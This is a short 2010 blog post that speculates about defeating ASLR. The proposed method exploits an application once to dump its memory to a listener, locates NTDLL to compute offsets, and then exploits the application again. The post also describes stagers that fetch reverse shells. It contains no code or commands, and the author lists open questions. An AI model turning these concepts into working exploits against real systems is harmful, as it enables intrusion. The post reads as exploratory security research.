Thursday, December 2, 2010

The not so typical multi staged exploit

After doing a lot of research on exploitation mitigation techniques (ASLR, DEP, Stack Cookies, etc), understanding exploitation methodologies like 'return to libc,' and watching Dino DiaZovi's talk about Memory Corruption, Exploitation, and you I thought about a different type of exploitation technique... A mulit-staged exploit where the second stage isn't the machine taking in the code you want to execute, but where the second stage is the actual exploit...

Typical multi stage exploitation is done in the following manner:

1. Application is exploited, and the stager code is run
2. The stager code connects back to a configured host, and obtains the actual connection mechanism that the attacker wants to run (reverse shell, meterpreter, clac, whatever)


The case that I am thinking about is where ASLR is in place, and an attacker can't reliably, at all point EIP to a piece of memory to take over execution.  Dino states in the presentation something to the extent of:

Exploits are going to move away from the typical code execution to more towards memory dumps


The whole concept of ASLR is randomizing where libraries exist in memory to invalidate jumping to static values in those libraries in order to take control of execution flow.

But, what if you can dump the memory to a listener from a known start location, look for a signature of where something like NTDLL exists, compute the offset, then re-exploit the application using the now known offset of the memory address you originally wanted to jump to when ASLR was not in place?  The workflow would be something like this:

1. Have memory listener/processor running
2. Exploit application to dump memory to #1
3. #1 looks for NTDLL starting signature, and computes offset (if you are dumping from 0)
4. Re-exploit application with now known memory offset

There are a lot of unknowns on my part, simply because I am not an expert at exploitation, but the concept seems somewhat feasible.

Unknowns:
- If you can exploit something to dump memory, why cant you run arbitrary code?
- You must have some way of getting a known offset to calculate the library offset
- The application must not crash, or must restart after the initial exploitation
- The memory dump is something that can be used in the above case
- Does ASLR stop return to libc? Or is libc loaded somewhere statically every time?

No comments:

Post a Comment